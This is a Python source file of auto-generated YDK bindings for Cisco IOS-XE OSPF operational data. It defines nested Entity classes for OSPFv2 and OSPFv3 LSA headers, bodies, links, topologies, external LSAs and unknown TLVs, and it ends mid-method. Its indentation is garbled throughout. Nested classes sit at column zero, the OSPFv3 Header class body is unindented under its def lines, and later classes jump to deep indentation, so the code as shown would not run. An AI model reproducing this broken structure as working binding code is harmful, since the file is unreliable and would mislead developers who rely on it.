
        def __setattr__(self, name, value):
            """Route attribute writes through ydk's validating setter."""
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)


    class LsaBody(Entity):
        """
        Decoded OSPFv2 LSA body data
        .. attribute:: num_of_links
        Number of links
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: network
        Network details
        **type**\:  :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>`
        **config**\: False
        .. attribute:: summary_mask
        Summary mask
        **type**\: union of the below types:
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: external_mask
        External mask
        **type**\: union of the below types:
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: body_flag_options
        LSA body flags
        **type**\:  :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
        **config**\: False
        """

        # YANG module metadata consumed by the ydk runtime.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Set up ydk bookkeeping, the network child, and leaf storage for the lsa-body container."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv2-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # Not a YANG list: no key leafs.
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
            # Leaf name -> (YLeaf descriptor, accepted Python type names);
            # two 'str' entries mark a union of the two address patterns.
            self._leafs = OrderedDict([
                ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
            ])
            self.num_of_links = None
            self.summary_mask = None
            self.external_mask = None
            # Bits-typed leaf holds a ydk Bits container, not None.
            self.body_flag_options = Bits()

            self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"
            self._segment_path = lambda: "lsa-body"
            # NOTE(review): assigned last by generator convention; appears to freeze
            # attribute creation — confirm against ydk Entity.
            self._is_frozen = True

        def __setattr__(self, name, value):
            """Route attribute writes through ydk's validating setter."""
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)


        class Network(Entity):
            """
            Network details
            .. attribute:: network_mask
            IP network mask
            **type**\: union of the below types:
            **type**\: str
            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
            **type**\: str
            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
            **config**\: False
            .. attribute:: attached_router
            List of the routers attached to the network
            **type**\: list of int
            **range:** 0..4294967295
            **config**\: False
            """

            # YANG module metadata consumed by the ydk runtime.
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                """Set up ydk bookkeeping and leaf storage for the network container."""
                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                self.yang_name = "network"
                self.yang_parent_name = "lsa-body"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                # Not a YANG list: no key leafs.
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                # Leaf name -> (YLeaf descriptor, accepted Python type names);
                # two 'str' entries mark a union of the two address patterns.
                self._leafs = OrderedDict([
                    ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                    ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                ])
                self.network_mask = None
                # leaf-list: holds zero or more router IDs.
                self.attached_router = []
                self._segment_path = lambda: "network"
                # NOTE(review): assigned last by generator convention; appears to freeze
                # attribute creation — confirm against ydk Entity.
                self._is_frozen = True

            def __setattr__(self, name, value):
                """Route attribute writes through ydk's validating setter."""
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
    """
    OSPFv2 LSA link
    .. attribute:: link_id  (key)
    Link ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: link_data  (key)
    Link data
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: type
    Link type
    **type**\: int
    **range:** 0..255
    **config**\: False
    .. attribute:: ospfv2_topology
    Topology specific information
    **type**\: list of  :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>`
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping, the topology child list, and leaf storage for one ospfv2-link entry."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leafs that together form this YANG list's key.
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
        # Leaf name -> (YLeaf descriptor, accepted Python type names).
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None

        self.ospfv2_topology = YList(self)
        # Relative XPath segment, including the two list-key predicates.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


    class Ospfv2Topology(Entity):
        """
        Topology specific information
        .. attribute:: mt_id  (key)
        MT\-ID for topology enabled link
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: metric
        Metric for the topology
        **type**\: int
        **range:** 0..65535
        **config**\: False
        """

        # YANG module metadata consumed by the ydk runtime.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Set up ydk bookkeeping and leaf storage for one per-link ospfv2-topology entry."""
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # Leaf that forms this YANG list's key.
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            # Leaf name -> (YLeaf descriptor, accepted Python type names).
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            # Relative XPath segment, including the list-key predicate.
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            # NOTE(review): assigned last by generator convention; appears to freeze
            # attribute creation — confirm against ydk Entity.
            self._is_frozen = True

        def __setattr__(self, name, value):
            """Route attribute writes through ydk's validating setter."""
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
    """
    Summary LSA
    .. attribute:: mt_id  (key)
    MT\-ID for topology enabled link
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: metric
    Metric for the topology
    **type**\: int
    **range:** 0..65535
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and leaf storage for one LSA-level ospfv2-topology entry."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leaf that forms this YANG list's key.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        # Leaf name -> (YLeaf descriptor, accepted Python type names).
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        # Relative XPath segment, including the list-key predicate.
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
    """
    External LSA
    .. attribute:: mt_id  (key)
    MT\-ID for topology enabled on the link
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: metric
    Metric for the topology
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: forwarding_address
    Forwarding address
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: external_route_tag
    Route tag
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and leaf storage for one ospfv2-external entry."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leaf that forms this YANG list's key.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        # Leaf name -> (YLeaf descriptor, accepted Python type names);
        # two 'str' entries mark a union of the two address patterns.
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        # Relative XPath segment, including the list-key predicate.
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
    """
    OSPFv2 Unknown TLV
    .. attribute:: type  (key)
    TLV type
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: length
    TLV length
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: value
    TLV value
    **type**\: list of int
    **range:** 0..255
    **config**\: False
    """

    # YANG module metadata consumed by the ydk runtime.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Set up ydk bookkeeping and leaf storage for one ospfv2-unknown-tlv entry."""
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
        self.yang_name = "ospfv2-unknown-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # Leaf that forms this YANG list's key.
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict([])
        # Leaf name -> (YLeaf descriptor, accepted Python type names).
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ])
        self.type = None
        self.length = None
        # leaf-list: raw TLV value bytes as ints.
        self.value = []
        # Relative XPath segment, including the list-key predicate.
        self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
        # NOTE(review): assigned last by generator convention; appears to freeze
        # attribute creation — confirm against ydk Entity.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validating setter."""
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Set up ydk bookkeeping and the two singleton children (header, lsa-body)."""
    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
    self.yang_name = "ospfv3-lsa-val"
    self.yang_parent_name = "link-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Not a YANG list: no key leafs.
    self.ylist_key_names = []
    # Child YANG name -> (python attribute, binding class) map.
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
    self._leafs = OrderedDict()

    self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"

    self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    # Container node: plain segment, no key predicates.
    self._segment_path = lambda: "ospfv3-lsa-val"
    # NOTE(review): assigned last by generator convention; appears to freeze
    # attribute creation — confirm against ydk Entity.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through ydk's validating setter."""
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
                            class LsaHeader(Entity):
                                """
                                LSA header (read\-only operational data).

                                .. attribute:: age

                                    LSA age

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                .. attribute:: type

                                    LSA type

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                .. attribute:: adv_router

                                    LSA advertising router

                                    **type**\: int

                                    **range:** 0..4294967295

                                    **config**\: False

                                .. attribute:: seq_num

                                    LSA sequence number

                                    **type**\: str

                                    **config**\: False

                                .. attribute:: checksum

                                    LSA checksum

                                    **type**\: str

                                    **config**\: False

                                .. attribute:: length

                                    LSA length

                                    **type**\: int

                                    **range:** 0..65535

                                    **config**\: False

                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    # Auto-generated ydk initializer for the "lsa-header" container.
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
                                    self.yang_name = "lsa-header"
                                    self.yang_parent_name = "header"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    # Leaf-only container: no child classes.
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ])
                                    self.age = None
                                    self.type = None
                                    self.adv_router = None
                                    self.seq_num = None
                                    self.checksum = None
                                    self.length = None
                                    self._segment_path = lambda: "lsa-header"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    # Restrict attribute writes to the declared YANG leafs.
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
                        class LsaBody(Entity):
                            """
                            Decoded OSPFv3 LSA body.

                            One child container per decodable LSA body variant; which child is
                            populated depends on the LSA type of the enclosing LSA.

                            .. attribute:: network

                                OSPFv3 network

                                **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>`

                                **config**\: False

                            .. attribute:: prefix

                                OSPFv3 inter area prefix

                                **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>`

                                **config**\: False

                            .. attribute:: ia_router

                                OSPFv3 inter area router

                                **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>`

                                **config**\: False

                            .. attribute:: lsa_external

                                OSPFv3 LSA external

                                **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>`

                                **config**\: False

                            .. attribute:: nssa

                                OSPFv3 NSSA

                                **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>`

                                **config**\: False

                            .. attribute:: link_data

                                OSPFv3 Link data

                                **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>`

                                **config**\: False

                            .. attribute:: ia_prefix

                                OSPFv3 Intra area prefixes

                                **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>`

                                **config**\: False

                            .. attribute:: lsa_flag_options

                                LSA options

                                **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`

                                **config**\: False

                            .. attribute:: lsa_body_flags

                                LSA Body Flags

                                **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`

                                **config**\: False

                            """
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                # Auto-generated ydk initializer: wires up all LSA-body variant
                                # child containers and the two bit-flag leafs.
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
                                self.yang_name = "lsa-body"
                                self.yang_parent_name = "ospfv3-lsa-val"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
                                self._leafs = OrderedDict([
                                    ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
                                    ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
                                ])
                                self.lsa_flag_options = Bits()
                                self.lsa_body_flags = Bits()
                                # Instantiate every variant container eagerly; the runtime fills in
                                # whichever one matches the decoded LSA.
                                self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
                                self.network.parent = self
                                self._children_name_map["network"] = "network"
                                self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
                                self.prefix.parent = self
                                self._children_name_map["prefix"] = "prefix"
                                self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
                                self.ia_router.parent = self
                                self._children_name_map["ia_router"] = "ia-router"
                                self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
                                self.lsa_external.parent = self
                                self._children_name_map["lsa_external"] = "lsa-external"
